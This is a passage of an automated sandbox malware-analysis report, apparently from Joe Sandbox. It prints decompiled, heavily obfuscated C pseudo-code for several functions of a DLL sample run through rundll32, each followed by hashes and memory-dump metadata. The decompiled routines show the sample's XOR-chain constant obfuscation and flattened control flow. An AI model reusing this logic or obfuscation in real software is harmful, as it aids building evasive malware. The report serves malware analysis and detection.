                                                                                                                          				_v52 = _v52 << 8;
                                                                                                                          				_v52 = _v52 ^ 0x5226582a;
                                                                                                                          				_v44 = 0x8cf369;
                                                                                                                          				_v44 = _v44 ^ 0x25329c0c;
                                                                                                                          				_v44 = _v44 / _t215;
                                                                                                                          				_v44 = _v44 >> 0xe;
                                                                                                                          				_v44 = _v44 ^ 0x0005c7da;
                                                                                                                          				_t216 =  *0x7b3e10; // 0x0
                                                                                                                          				_t203 = E0079B6CF(_t216 + 0x1c, _v32, _v16, _v40);
                                                                                                                          				_t241 = _a4 + 0x2c;
                                                                                                                          				_t204 = E0079B23C(_v68, _v48, _a4 + 0x2c, _v24, _v72, _t203);
                                                                                                                          				_t248 = _t204;
                                                                                                                          				if(_t204 != 0) {
                                                                                                                          					_push(_v64);
                                                                                                                          					_push(_v8);
                                                                                                                          					_t207 = E007ADCF7(_v56, 0x791000, _t248);
                                                                                                                          					_pop(_t221);
                                                                                                                          					E007947CE( *((intOrPtr*)(_a8 + 0x18)), _v36, _t221, _v28, _v20, _t207, _t241, _v12, _v80);
                                                                                                                          					E0079A8B0(_v60, _t207, _v76);
                                                                                                                          					E007A1F8A(_v52, _v44,  &_v608);
                                                                                                                          				}
                                                                                                                          				return 1;
                                                                                                                          			}



































                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcmpi
                                                                                                                          • String ID: *X&R$0M*$7m_$@!x
                                                                                                                          • API String ID: 1586166983-4050865940
                                                                                                                          • Opcode ID: 004f44d492d65939a2fe3af0e0bed4976815fb60795ccefe6be6e8f8bd2ecbc4
                                                                                                                          • Instruction ID: 4588d53a0c350ef3d211b8924f79aaf33789307a9b3f3a2421e7ddc7562bb4b8
                                                                                                                          • Opcode Fuzzy Hash: 004f44d492d65939a2fe3af0e0bed4976815fb60795ccefe6be6e8f8bd2ecbc4
                                                                                                                          • Instruction Fuzzy Hash: 88811371C0121DEFCF49DFA1D88A8EEBBB1FB44718F208118E511B6260D7B55A4ACF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 92%
                                                                                                                          			E0079EA99(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                          				signed int _v4;
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				void* _t136;
                                                                                                                          				signed int _t147;
                                                                                                                          				void* _t150;
                                                                                                                          				intOrPtr* _t152;
                                                                                                                          				void* _t154;
                                                                                                                          				void* _t165;
                                                                                                                          				signed int _t166;
                                                                                                                          				signed int _t167;
                                                                                                                          				signed int* _t171;
                                                                                                                          
                                                                                                                          				_push(_a16);
                                                                                                                          				_t152 = __edx;
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t136);
                                                                                                                          				_v52 = 0x4b44d9;
                                                                                                                          				_t171 =  &(( &_v68)[6]);
                                                                                                                          				_t165 = 0;
                                                                                                                          				_t154 = 0x40ad1f2;
                                                                                                                          				_t166 = 0x41;
                                                                                                                          				_v52 = _v52 * 0x5c;
                                                                                                                          				_v52 = _v52 ^ 0xd486af61;
                                                                                                                          				_v52 = _v52 ^ 0xcf8a129f;
                                                                                                                          				_v24 = 0x8b17cc;
                                                                                                                          				_v24 = _v24 + 0xffff02b5;
                                                                                                                          				_v24 = _v24 ^ 0x008a1a91;
                                                                                                                          				_v64 = 0xcc4e1;
                                                                                                                          				_v64 = _v64 ^ 0x71537a57;
                                                                                                                          				_v64 = _v64 | 0xbc84d226;
                                                                                                                          				_v64 = _v64 + 0x8a58;
                                                                                                                          				_v64 = _v64 ^ 0xbde0890e;
                                                                                                                          				_v12 = 0x10173e;
                                                                                                                          				_v12 = _v12 / _t166;
                                                                                                                          				_v12 = _v12 ^ 0x000bb2e7;
                                                                                                                          				_v16 = 0xcbf18d;
                                                                                                                          				_v16 = _v16 + 0x7f8c;
                                                                                                                          				_v16 = _v16 ^ 0x00cd0dea;
                                                                                                                          				_v20 = 0x7a67ce;
                                                                                                                          				_v20 = _v20 << 1;
                                                                                                                          				_v20 = _v20 ^ 0x00fa626e;
                                                                                                                          				_v68 = 0x7779f8;
                                                                                                                          				_v68 = _v68 + 0xa85e;
                                                                                                                          				_v68 = _v68 << 0x10;
                                                                                                                          				_v68 = _v68 >> 3;
                                                                                                                          				_v68 = _v68 ^ 0x0443aeb4;
                                                                                                                          				_v28 = 0xee6391;
                                                                                                                          				_v28 = _v28 ^ 0x2bfa2339;
                                                                                                                          				_v28 = _v28 ^ 0x2b1bacd2;
                                                                                                                          				_v32 = 0x87b642;
                                                                                                                          				_v32 = _v32 + 0xffff3baa;
                                                                                                                          				_v32 = _v32 ^ 0x008fda80;
                                                                                                                          				_v36 = 0x3b697f;
                                                                                                                          				_v36 = _v36 | 0x5675f49c;
                                                                                                                          				_v36 = _v36 ^ 0x5679bffa;
                                                                                                                          				_v40 = 0x254a84;
                                                                                                                          				_v40 = _v40 * 0x67;
                                                                                                                          				_v40 = _v40 ^ 0x0f0bd396;
                                                                                                                          				_v44 = 0xfc206d;
                                                                                                                          				_v44 = _v44 * 0x45;
                                                                                                                          				_v44 = _v44 ^ 0x43f6aa11;
                                                                                                                          				_v56 = 0x3dd941;
                                                                                                                          				_v56 = _v56 ^ 0x94d2d45c;
                                                                                                                          				_v56 = _v56 >> 9;
                                                                                                                          				_v56 = _v56 ^ 0x00419011;
                                                                                                                          				_v4 = 0xdcf5c3;
                                                                                                                          				_v4 = _v4 ^ 0x0d464ae6;
                                                                                                                          				_v4 = _v4 ^ 0x0d938ce3;
                                                                                                                          				_v60 = 0xe23f0;
                                                                                                                          				_v60 = _v60 ^ 0x0435e191;
                                                                                                                          				_v60 = _v60 ^ 0xbde67646;
                                                                                                                          				_v60 = _v60 ^ 0xb922f804;
                                                                                                                          				_v60 = _v60 ^ 0x00f2260b;
                                                                                                                          				_v8 = 0x523a90;
                                                                                                                          				_v8 = _v8 * 0x75;
                                                                                                                          				_v8 = _v8 ^ 0x259e6962;
                                                                                                                          				_v48 = 0x46565e;
                                                                                                                          				_t167 = 3;
                                                                                                                          				_v48 = _v48 * 0x6a;
                                                                                                                          				_t168 = _v4;
                                                                                                                          				_v48 = _v48 / _t167;
                                                                                                                          				_v48 = _v48 ^ 0x09b4f31e;
                                                                                                                          				do {
                                                                                                                          					while(_t154 != 0x40ad1f2) {
                                                                                                                          						if(_t154 == 0x458d12f) {
                                                                                                                          							_t147 = E00798F65(_v12, _v16, _a12, _v20, _v24, _t154, _v64, _v68, _v52, _v28, _t154, 0);
                                                                                                                          							_t168 = _t147;
                                                                                                                          							_t171 =  &(_t171[0xa]);
                                                                                                                          							if(_t147 != 0xffffffff) {
                                                                                                                          								_t154 = 0x4af2a99;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							if(_t154 == 0x4af2a99) {
                                                                                                                          								_t150 = E007919B8(_t154, _v36,  *((intOrPtr*)(_t152 + 4)), _v40, _t168, _v44, _v56, _t152 + 4,  *_t152);
                                                                                                                          								_t171 =  &(_t171[8]);
                                                                                                                          								_t165 = _t150;
                                                                                                                          								_t154 = 0xe5b5021;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t154 != 0xe5b5021) {
                                                                                                                          									goto L11;
                                                                                                                          								} else {
                                                                                                                          									E007A1E67(_v4, _v60, _v8, _v48, _t168);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L6:
                                                                                                                          						return _t165;
                                                                                                                          					}
                                                                                                                          					_t154 = 0x458d12f;
                                                                                                                          					L11:
                                                                                                                          				} while (_t154 != 0xd2f352d);
                                                                                                                          				goto L6;
                                                                                                                          			}

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: -5/$WzSq$^VF$JF
                                                                                                                          • API String ID: 0-2399144359
                                                                                                                          • Opcode ID: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                          • Instruction ID: c496705aa0fd3da244d34a4b95da25523c741fba91bd3ab81fcf0545ba043e23
                                                                                                                          • Opcode Fuzzy Hash: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                          • Instruction Fuzzy Hash: A97131711083419BCB58CF65D98A81BBBF2FBC9758F504A1DF29696220C3B5DA48DF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E007A9BCF() {
                                                                                                                          				char _v520;
                                                                                                                          				signed int _v524;
                                                                                                                          				signed int _v528;
                                                                                                                          				signed int _v532;
                                                                                                                          				signed int _v536;
                                                                                                                          				unsigned int _v540;
                                                                                                                          				signed int _v544;
                                                                                                                          				signed int _v548;
                                                                                                                          				signed int _v552;
                                                                                                                          				signed int _v556;
                                                                                                                          				signed int _v560;
                                                                                                                          				signed int _v564;
                                                                                                                          				signed int _v568;
                                                                                                                          				signed int _t111;
                                                                                                                          				signed int _t115;
                                                                                                                          				signed int _t117;
                                                                                                                          				void* _t118;
                                                                                                                          				signed int _t132;
                                                                                                                          				void* _t134;
                                                                                                                          				signed int _t135;
                                                                                                                          				signed int* _t136;
                                                                                                                          
                                                                                                                          				_t136 =  &_v568;
                                                                                                                          				_v560 = 0x297e3c;
                                                                                                                          				_v560 = _v560 >> 9;
                                                                                                                          				_t118 = 0x4ead2fe;
                                                                                                                          				_v560 = _v560 + 0xe8be;
                                                                                                                          				_v560 = _v560 ^ 0xc9c09221;
                                                                                                                          				_v560 = _v560 ^ 0xc9c20db8;
                                                                                                                          				_v540 = 0x190e1d;
                                                                                                                          				_v540 = _v540 >> 7;
                                                                                                                          				_v540 = _v540 >> 0xd;
                                                                                                                          				_v540 = _v540 ^ 0x000cdd3b;
                                                                                                                          				_v544 = 0x86c2f0;
                                                                                                                          				_v544 = _v544 | 0x0d7eac20;
                                                                                                                          				_v544 = _v544 ^ 0xe6b61282;
                                                                                                                          				_v544 = _v544 ^ 0xeb41e563;
                                                                                                                          				_v552 = 0x262f60;
                                                                                                                          				_v552 = _v552 ^ 0x76c91adc;
                                                                                                                          				_v552 = _v552 + 0xd1c5;
                                                                                                                          				_v552 = _v552 ^ 0x76fc323e;
                                                                                                                          				_v524 = 0xf427e0;
                                                                                                                          				_v524 = _v524 + 0xffff22a3;
                                                                                                                          				_v524 = _v524 ^ 0x00f85f52;
                                                                                                                          				_v548 = 0xdbc1a5;
                                                                                                                          				_v548 = _v548 >> 0xb;
                                                                                                                          				_v548 = _v548 + 0xf615;
                                                                                                                          				_v548 = _v548 ^ 0x0006ff3e;
                                                                                                                          				_v556 = 0xd2f840;
                                                                                                                          				_v556 = _v556 * 0x5f;
                                                                                                                          				_t134 = 0;
                                                                                                                          				_v556 = _v556 ^ 0x4e4cccaa;
                                                                                                                          				_v568 = 0x74ecfa;
                                                                                                                          				_t132 = 0x53;
                                                                                                                          				_t133 = _v556;
                                                                                                                          				_v568 = _v568 / _t132;
                                                                                                                          				_v568 = _v568 ^ 0xc72664ff;
                                                                                                                          				_v568 = _v568 << 0xf;
                                                                                                                          				_v568 = _v568 ^ 0x862d9f40;
                                                                                                                          				_v536 = 0xc0d44a;
                                                                                                                          				_v536 = _v536 + 0x396d;
                                                                                                                          				_t135 = _v556;
                                                                                                                          				_t117 = _v556;
                                                                                                                          				_v536 = _v536 * 0x46;
                                                                                                                          				_v536 = _v536 ^ 0x34c6c601;
                                                                                                                          				_v532 = 0xf37e83;
                                                                                                                          				_v532 = _v532 << 8;
                                                                                                                          				_v532 = _v532 | 0x760e0a19;
                                                                                                                          				_v532 = _v532 ^ 0xf77c332a;
                                                                                                                          				_v528 = 0x91f8e3;
                                                                                                                          				_v528 = _v528 ^ 0xc904aca2;
                                                                                                                          				_v528 = _v528 ^ 0xc9900919;
                                                                                                                          				do {
                                                                                                                          					while(_t118 != 0x27fe330) {
                                                                                                                          						if(_t118 == 0x4ead2fe) {
                                                                                                                          							_t118 = 0x96d401d;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t118 == 0x7ac597b) {
                                                                                                                          								_t117 = E0079B6CF( &_v520, _v548, _v556, _v568);
                                                                                                                          								_t118 = 0xa7595e6;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t118 == 0x80b0e4e) {
                                                                                                                          									_t90 =  &_v552; // 0xeb41e563
                                                                                                                          									_t111 = E00799B83(_t133, __eflags, _v544,  *_t90,  &_v520, _v524);
                                                                                                                          									_t136 =  &(_t136[4]);
                                                                                                                          									__eflags = _t111;
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										_t118 = 0x7ac597b;
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									if(_t118 == 0x96d401d) {
                                                                                                                          										_t115 = E007952C2();
                                                                                                                          										_t133 = _t115;
                                                                                                                          										__eflags = _t115;
                                                                                                                          										if(__eflags != 0) {
                                                                                                                          											_t118 = 0x80b0e4e;
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										if(_t118 != 0xa7595e6) {
                                                                                                                          											goto L15;
                                                                                                                          										} else {
                                                                                                                          											_t135 = E00792051(_v532, _t117, _v528);
                                                                                                                          											_t118 = 0x27fe330;
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L16;
                                                                                                                          					}
                                                                                                                          					_v564 = 0x69bdc3;
                                                                                                                          					_v564 = _v564 | 0xfd1bce6c;
                                                                                                                          					_v564 = _v564 ^ 0xf153ffb6;
                                                                                                                          					_v564 = _v564 ^ 0x260f00bb;
                                                                                                                          					__eflags = _t135 - _v564;
                                                                                                                          					_t134 =  ==  ? 1 : _t134;
                                                                                                                          					_t118 = 0x8b668cc;
                                                                                                                          					L15:
                                                                                                                          					__eflags = _t118 - 0x8b668cc;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				L16:
                                                                                                                          				return _t134;
                                                                                                                          			}

























                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: <~)$`/&$cA$m9
                                                                                                                          • API String ID: 0-2671356241
                                                                                                                          • Opcode ID: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                          • Instruction ID: 1533f588d5a3d3194c4d2eb0219dc7355952d180916296582ffe2ac12ada9c01
                                                                                                                          • Opcode Fuzzy Hash: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                          • Instruction Fuzzy Hash: E851747110C3019FC388CE21D09942BBBE1FFD8758F501E1EF6A696261C378CA598F92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E00799B83(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                          				unsigned int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				char _v52;
                                                                                                                          				void* _v64;
                                                                                                                          				intOrPtr _v68;
                                                                                                                          				void* _t115;
                                                                                                                          				signed int _t130;
                                                                                                                          				signed int _t131;
                                                                                                                          				void* _t133;
                                                                                                                          
                                                                                                                          				_push(_a16);
                                                                                                                          				_push(_a12);
                                                                                                                          				_v52 = 0x104;
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(0x104);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(0x104);
                                                                                                                          				_v68 = 0x342964;
                                                                                                                          				asm("stosd");
                                                                                                                          				_t133 = 0;
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_v40 = 0xa3a3c;
                                                                                                                          				_v40 = _v40 + 0x2c25;
                                                                                                                          				_v40 = _v40 ^ 0x000a7661;
                                                                                                                          				_v16 = 0x75ee44;
                                                                                                                          				_t130 = 0x7a;
                                                                                                                          				_v16 = _v16 / _t130;
                                                                                                                          				_v16 = _v16 ^ 0xc9e42672;
                                                                                                                          				_v16 = _v16 ^ 0xc9e58a7e;
                                                                                                                          				_v8 = 0x386b92;
                                                                                                                          				_v8 = _v8 << 4;
                                                                                                                          				_v8 = _v8 | 0x0ec9a536;
                                                                                                                          				_v8 = _v8 >> 0xf;
                                                                                                                          				_v8 = _v8 ^ 0x000b4478;
                                                                                                                          				_v44 = 0xd66787;
                                                                                                                          				_v44 = _v44 >> 3;
                                                                                                                          				_v44 = _v44 ^ 0x001d593f;
                                                                                                                          				_v24 = 0x7c5a73;
                                                                                                                          				_v24 = _v24 | 0xae316990;
                                                                                                                          				_t131 = 0x19;
                                                                                                                          				_v24 = _v24 / _t131;
                                                                                                                          				_v24 = _v24 ^ 0x06f0967a;
                                                                                                                          				_v20 = 0x3dfd52;
                                                                                                                          				_v20 = _v20 >> 8;
                                                                                                                          				_v20 = _v20 * 0x24;
                                                                                                                          				_v20 = _v20 ^ 0x0009affd;
                                                                                                                          				_v12 = 0xf0c6a5;
                                                                                                                          				_v12 = _v12 + 0xffff2be4;
                                                                                                                          				_v12 = _v12 + 0x1686;
                                                                                                                          				_v12 = _v12 << 2;
                                                                                                                          				_v12 = _v12 ^ 0x03c3840c;
                                                                                                                          				_v48 = 0x30c967;
                                                                                                                          				_v48 = _v48 | 0xcae095b2;
                                                                                                                          				_v48 = _v48 ^ 0xcaf7f966;
                                                                                                                          				_v36 = 0xabcbdc;
                                                                                                                          				_v36 = _v36 + 0xfffff856;
                                                                                                                          				_v36 = _v36 | 0xb2b71321;
                                                                                                                          				_v36 = _v36 ^ 0xb2b3c312;
                                                                                                                          				_v32 = 0xda8dbe;
                                                                                                                          				_v32 = _v32 + 0xffff364b;
                                                                                                                          				_v32 = _v32 | 0x02598b37;
                                                                                                                          				_v32 = _v32 ^ 0x02d31c0a;
                                                                                                                          				_v28 = 0x528ee8;
                                                                                                                          				_v28 = _v28 * 0x12;
                                                                                                                          				_v28 = _v28 << 2;
                                                                                                                          				_v28 = _v28 ^ 0x17383776;
                                                                                                                          				_t115 = E007991DD(__ecx, _v40, __ecx);
                                                                                                                          				_t132 = _t115;
                                                                                                                          				if(_t115 != 0) {
                                                                                                                          					_t133 = E007976AA(_a12,  &_v52, _v44, _v24, __ecx, _v20, _t132, _v12);
                                                                                                                          					E007A1E67(_v48, _v36, _v32, _v28, _t132);
                                                                                                                          				}
                                                                                                                          				return _t133;
                                                                                                                          			}






















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Du$av$d)4$sZ|
                                                                                                                          • API String ID: 0-269012183
                                                                                                                          • Opcode ID: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                          • Instruction ID: c9156c91db360bd20a3c1e7761b8f77de98e5bf10ea60cb9bc9b3fea05b7c84d
                                                                                                                          • Opcode Fuzzy Hash: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                          • Instruction Fuzzy Hash: 9D5112B1D00209EBDF09DFE5C94A8EEBBB1FB48318F108158E412B6260D3755A59DFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                          • GetACP.KERNEL32 ref: 1004377E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4232894706-0
                                                                                                                          • Opcode ID: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                          • Instruction ID: 788673dfdacf9fce6eb7172e6dd538a5e2a4211a9e61a4e82855ee0bc522c5dc
                                                                                                                          • Opcode Fuzzy Hash: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                          • Instruction Fuzzy Hash: 8AF0C871E04238ABE715DBA489955EFB7E4EB09A81B11816CD981E7251EA206D0487C9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                          • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                          • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                          • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E007A0E53(void* __ecx) {
                                                                                                                          				char _v520;
                                                                                                                          				char _v1040;
                                                                                                                          				char _v1560;
                                                                                                                          				char _v2080;
                                                                                                                          				char _v2600;
                                                                                                                          				signed int _v2604;
                                                                                                                          				signed int _v2608;
                                                                                                                          				signed int _v2612;
                                                                                                                          				signed int _v2616;
                                                                                                                          				signed int _v2620;
                                                                                                                          				signed int _v2624;
                                                                                                                          				signed int _v2628;
                                                                                                                          				signed int _v2632;
                                                                                                                          				signed int _v2636;
                                                                                                                          				signed int _v2640;
                                                                                                                          				signed int _v2644;
                                                                                                                          				signed int _v2648;
                                                                                                                          				signed int _v2652;
                                                                                                                          				signed int _v2656;
                                                                                                                          				signed int _v2660;
                                                                                                                          				signed int _v2664;
                                                                                                                          				signed int _v2668;
                                                                                                                          				signed int _v2672;
                                                                                                                          				signed int _v2676;
                                                                                                                          				signed int _v2680;
                                                                                                                          				signed int _v2684;
                                                                                                                          				signed int _v2688;
                                                                                                                          				signed int _v2692;
                                                                                                                          				signed int _v2696;
                                                                                                                          				signed int _v2700;
                                                                                                                          				signed int _v2704;
                                                                                                                          				signed int _v2708;
                                                                                                                          				signed int _v2712;
                                                                                                                          				signed int _v2716;
                                                                                                                          				signed int _v2720;
                                                                                                                          				signed int _v2724;
                                                                                                                          				signed int _v2728;
                                                                                                                          				signed int _v2732;
                                                                                                                          				signed int _v2736;
                                                                                                                          				signed int _v2740;
                                                                                                                          				signed int _v2744;
                                                                                                                          				signed int _v2748;
                                                                                                                          				signed int _v2752;
                                                                                                                          				signed int _v2756;
                                                                                                                          				signed int _v2760;
                                                                                                                          				signed int _v2764;
                                                                                                                          				signed int _v2768;
                                                                                                                          				signed int _v2772;
                                                                                                                          				signed int _t406;
                                                                                                                          				signed int _t426;
                                                                                                                          				signed int _t427;
                                                                                                                          				signed int _t428;
                                                                                                                          				signed int _t429;
                                                                                                                          				signed int _t430;
                                                                                                                          				signed int _t435;
                                                                                                                          				void* _t467;
                                                                                                                          				void* _t468;
                                                                                                                          				signed int* _t472;
                                                                                                                          
                                                                                                                          				_t472 =  &_v2772;
                                                                                                                          				_v2700 = 0xd36ba7;
                                                                                                                          				_v2700 = _v2700 << 7;
                                                                                                                          				_v2700 = _v2700 ^ 0xaed70c65;
                                                                                                                          				_v2700 = _v2700 ^ 0xc762dfcc;
                                                                                                                          				_v2652 = 0x6f4609;
                                                                                                                          				_t9 =  &_v2652; // 0x6f4609
                                                                                                                          				_v2652 =  *_t9 * 0x1c;
                                                                                                                          				_t467 = __ecx;
                                                                                                                          				_v2652 = _v2652 ^ 0x0c23569d;
                                                                                                                          				_t468 = 0xea1969c;
                                                                                                                          				_v2608 = 0xb8394b;
                                                                                                                          				_v2608 = _v2608 + 0xaeb5;
                                                                                                                          				_v2608 = _v2608 ^ 0x00b390c3;
                                                                                                                          				_v2736 = 0x3d33f1;
                                                                                                                          				_v2736 = _v2736 + 0xffffd537;
                                                                                                                          				_v2736 = _v2736 + 0xffffb6ee;
                                                                                                                          				_v2736 = _v2736 + 0xbad8;
                                                                                                                          				_v2736 = _v2736 ^ 0x003e0409;
                                                                                                                          				_v2768 = 0xd1d4ce;
                                                                                                                          				_v2768 = _v2768 >> 0xc;
                                                                                                                          				_v2768 = _v2768 ^ 0xb5c37fe4;
                                                                                                                          				_v2768 = _v2768 + 0x4eb3;
                                                                                                                          				_v2768 = _v2768 ^ 0xb5c2c9c4;
                                                                                                                          				_v2760 = 0x157bbd;
                                                                                                                          				_v2760 = _v2760 ^ 0x6d7617e7;
                                                                                                                          				_v2760 = _v2760 ^ 0x1b56cd2f;
                                                                                                                          				_v2760 = _v2760 ^ 0xfb63426d;
                                                                                                                          				_v2760 = _v2760 ^ 0x8d577604;
